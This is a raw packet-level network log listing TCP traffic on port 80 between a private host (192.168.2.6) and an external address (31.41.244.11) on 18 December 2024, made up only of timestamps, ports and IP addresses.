                                                                                                                                                              Dec 18, 2024 11:47:16.175236940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.175291061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.175359964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.175410986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.176486015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.176541090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.177002907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.177048922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.177619934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.177680969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.178066969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.178173065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.178759098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.178771019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.178807020 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.179917097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.179991007 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.180588007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.181097031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.181142092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.181461096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.182208061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.182251930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.183120966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.183177948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.183435917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.184221029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.184309006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.184623003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.184633017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.184695005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.185750008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.185810089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.186093092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.186146975 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.186919928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.186964035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.187019110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.187063932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.188136101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.188189030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.188949108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.189002037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.189302921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.189313889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.189356089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.190531969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.190696955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.190726995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.190738916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.191598892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.191785097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.191833019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.192785025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.193267107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.193324089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.193944931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.193993092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.195189953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.195202112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.195209980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.195241928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.195281029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.196299076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.196346998 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.196635008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.196705103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.197540998 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.197554111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.197603941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.198642015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.198693037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.198697090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.198807001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.199811935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.199857950 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.199990988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.200037003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.201528072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.201580048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.201630116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.202310085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.202661037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.202709913 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.203710079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.203758955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.204039097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.204087019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.333645105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.333803892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.334165096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.334192038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.334209919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.334234953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.334274054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.334275007 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.335434914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.335549116 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.335630894 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.335670948 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.336441040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.336488008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.336853027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.336906910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.336911917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.336946964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.338027954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.338078022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.338156939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.338207006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.339184046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.339246988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.340034008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.340100050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.340434074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.340481997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.340760946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.340806007 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.341865063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.341912031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.342241049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.342293024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.342715025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.342770100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.343580961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.343627930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.343887091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.344002008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.345081091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.345093966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.345104933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.345129013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.345139980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.346225023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.346286058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.346518040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.346561909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.347486973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.347537994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.347888947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.347935915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.348788023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.348870993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.348897934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.348941088 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.349737883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.349795103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.349824905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.349869967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.350914001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.350961924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.351082087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.351147890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.352427959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.352479935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.352648020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.352694035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.353636980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.353688002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.353940964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.354013920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.354541063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.354552984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.354589939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.355604887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.355654955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.356162071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.356228113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.356770992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.356815100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.357724905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.357784033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.358026028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.358038902 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.358077049 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.359220028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.359268904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.359419107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.359463930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.360289097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.360402107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.360976934 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.361078978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.361464024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.361485958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.361524105 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.362622976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.362670898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.362754107 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.362814903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.363807917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.363863945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.363912106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.363962889 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.365030050 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.365118027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.365323067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.365375042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.366940975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.366995096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.367018938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.367239952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.367795944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.367816925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.367849112 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.367885113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.368624926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.368686914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.368716955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.368757010 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.369637012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.369690895 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.369864941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.369911909 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.370790958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.370841980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.371720076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.371781111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.372095108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.372175932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.372263908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.372324944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.373167992 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.373222113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.373713017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.373759031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.374305964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.374353886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.375505924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.375518084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.375529051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.375566006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.375591993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.376682997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.376743078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.376876116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.376935959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.377840996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.377890110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.378081083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.378202915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.378998995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.379048109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.379061937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.379108906 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.380192995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.380254030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.380255938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.380287886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.381377935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.381453991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.381470919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.381493092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.382540941 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.382594109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.382895947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.382953882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.383707047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.383761883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.383974075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.384026051 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.384852886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.384980917 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.384991884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.385035038 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.386029005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.386120081 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.386255026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.386307001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.387208939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.387254953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.387284040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.387331009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.388346910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.388395071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.388483047 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.388537884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.389558077 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.389604092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.389709949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.389764071 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.390743971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.390800953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.391421080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.391469002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.391915083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.391978979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.392049074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.392190933 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.393048048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.393106937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.393163919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.393225908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.394221067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.394270897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.394500971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.394547939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.524616957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.524741888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.524872065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.524919987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.525132895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.525341988 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.525357962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:16.525410891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:16.526418924 CET804980631.41.244.11192.168.2.6
